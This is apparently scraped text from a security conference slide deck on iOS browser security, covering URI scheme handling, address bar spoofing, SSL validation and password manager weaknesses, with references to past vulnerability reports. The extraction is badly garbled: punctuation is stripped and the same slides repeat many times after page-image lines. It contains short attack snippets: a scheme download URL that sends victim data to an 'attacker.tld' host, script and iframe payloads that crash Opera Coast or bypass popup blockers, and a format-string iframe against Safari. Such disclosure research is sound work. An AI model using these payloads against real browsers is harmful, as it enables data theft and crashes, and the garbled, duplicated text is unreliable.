Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 65: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/65.jpg)
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 66: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/66.jpg)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 67: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/67.jpg)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 68: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/68.jpg)
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 69: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/69.jpg)
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 70: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/70.jpg)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 71: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/71.jpg)
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 72: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/72.jpg)
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 73: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/73.jpg)
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
